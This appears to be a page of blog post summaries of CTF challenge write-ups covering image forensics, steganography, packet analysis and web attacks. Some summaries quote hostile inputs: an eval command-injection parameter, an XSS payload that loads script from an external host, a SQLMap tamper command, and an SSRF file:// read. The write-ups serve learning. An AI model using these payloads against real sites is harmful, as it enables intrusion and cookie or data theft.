上一页 1 ··· 14 15 16 17 18 19 20 21 22 ··· 41 下一页
摘要: 这题考察的是 用 winhex 更改图片长宽 ![image](https://img2023.cnblogs.com/blog/3092507/202309/3092507-20230901164524994-1708865007.png) 开头第二排两个字母对应的 xx xx 便是长和宽的值 慢 阅读全文
posted @ 2023-09-01 16:46 N0zoM1z0 阅读(54) 评论(0) 推荐(0) 编辑
摘要: 主要是第二张GIF格式损坏 对照 第一张GIF的文件头 ![image](https://img2023.cnblogs.com/blog/3092507/202309/3092507-20230901162413633-1214761605.png) 用winhex进行修补后分帧即可查看到flag 阅读全文
posted @ 2023-09-01 16:25 N0zoM1z0 阅读(60) 评论(0) 推荐(0) 编辑
摘要: # eval执行 用法 ?cmd=system("cmd") 这样传入的字符串就会被解析成系统命令 尝试 "ls"发现index.php 进入下级目录没用 #### 构造 "cd ../;ls"尝试多次发现 "cd ../../../;ls"后出现flag ![image](https://img2 阅读全文
posted @ 2023-09-01 15:50 N0zoM1z0 阅读(1) 评论(0) 推荐(0) 编辑
摘要: 还是用SQLMap实现(SQLMap太香了!) 命令格式: ``` python3 sqlmap.py -u ... --dbs --tamper "space2comment.py" ``` 然后还是选择 sqli 库 只是这次得到的 column就很离谱了 ![image](https://im 阅读全文
posted @ 2023-09-01 12:02 N0zoM1z0 阅读(15) 评论(0) 推荐(0) 编辑
摘要: 这题没有明显可见的可传的GET参数 观察源码: 这个是对于url中的GET参数 如果 参数名字为 jumpto的话就进行跳转 所以我们可以利用 ?jumpto= 来进行 xss注入 由于这题是跳转型 不能直接用 </tEXtArEa>'"><sCRiPt sRC=//uj.ci/idp></sCrI 阅读全文
posted @ 2023-09-01 11:32 N0zoM1z0 阅读(203) 评论(0) 推荐(0) 编辑
摘要: 注意这个题要自己加闭合语句 先随便输入观察源码: ![image](https://img2023.cnblogs.com/blog/3092507/202309/3092507-20230901111108273-1671560451.png) 而我们的XSS语句原始是这样的: ``` '"> ` 阅读全文
posted @ 2023-09-01 11:12 N0zoM1z0 阅读(61) 评论(0) 推荐(0) 编辑
摘要: ### 内网访问 直接访问 127.0.0.1/flag.php 即可 ### 伪协议读取文件 ``` ?url=file:///var/www/html/flag.php ``` ### 302跳转bypass 所谓的302就是 ?url=... 后面的网址 等价于 ?path=... 访问网站源 阅读全文
posted @ 2023-09-01 10:34 N0zoM1z0 阅读(4) 评论(0) 推荐(0) 编辑
摘要: ### 存储型XSS ![image](https://img2023.cnblogs.com/blog/3092507/202308/3092507-20230830093417050-1507050033.png) 在 XSS平台生成一个项目后 将XSS注入语句填入 name 复制该题网址到ur 阅读全文
posted @ 2023-09-01 10:21 N0zoM1z0 阅读(16) 评论(0) 推荐(0) 编辑
摘要: wireshark分析后能找到 flag.rar 相关的流量 同foremost将其分离后 会得到一个 含有flag.txt的zip 但是它不是伪加密。。。 用AAPR四位数爆破得到密码 解压即可得到flag{} 阅读全文
posted @ 2023-09-01 09:02 N0zoM1z0 阅读(39) 评论(0) 推荐(0) 编辑
摘要: 结合题目判断是 F5隐写 利用工具 F5-steganography-master 用法 ``` cmd : java Extract 图片路径 ``` 打开 output.txt 可以发现是一个zip文件 里面有 flag.txt 改成 .zip后缀后发现是一个伪加密 直接修改标志位后解压即可得到 阅读全文
posted @ 2023-09-01 08:34 N0zoM1z0 阅读(55) 评论(0) 推荐(0) 编辑
上一页 1 ··· 14 15 16 17 18 19 20 21 22 ··· 41 下一页